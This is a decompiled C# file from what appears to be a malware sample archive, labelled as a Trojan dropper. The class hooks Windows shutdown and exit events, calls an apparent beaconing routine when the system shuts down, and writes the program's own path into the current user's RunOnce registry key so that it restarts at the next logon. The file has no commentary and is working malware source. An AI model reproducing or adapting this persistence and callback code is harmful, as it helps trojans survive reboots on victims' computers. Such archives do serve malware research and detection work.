MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc/_event.cs

// Decompiled with JetBrains decompiler
// Type: Poly._event
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe

using Microsoft.Win32;
using System;
using System.IO;
using System.Threading;
using System.Windows.Forms;

namespace Poly
{
  public class _event : Base_Settings
  {
    public override void Initialise() => this.addEventHandlers();

    public override void Run() => base.Run();

    private void addEventHandlers()
    {
      SystemEvents.SessionEnding += new SessionEndingEventHandler(_event.SystemEvents_SessionEnding);
      AppDomain.CurrentDomain.ProcessExit += new EventHandler(this.UnloadFuse);
      AppDomain.CurrentDomain.DomainUnload += new EventHandler(this.UnloadFuse);
      Application.ApplicationExit += new EventHandler(this.UnloadFuse);
    }

    private static void SystemEvents_SessionEnding(object sender, SessionEndingEventArgs e)
    {
      if (e.Reason != SessionEndReasons.SystemShutdown)
        return;
      Base_Settings.status = "System shutting down";
      _communicate.forceTalk();
      try
      {
        Console.Write("Writing to registry... ");
        Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
        Console.Write("Registry write complete!\n");
      }
      catch
      {
      }
    }

    private void UnloadFuse(object sender, EventArgs e)
    {
      Console.WriteLine("Application Closing...");
      Thread.Sleep(5000);
    }
  }
}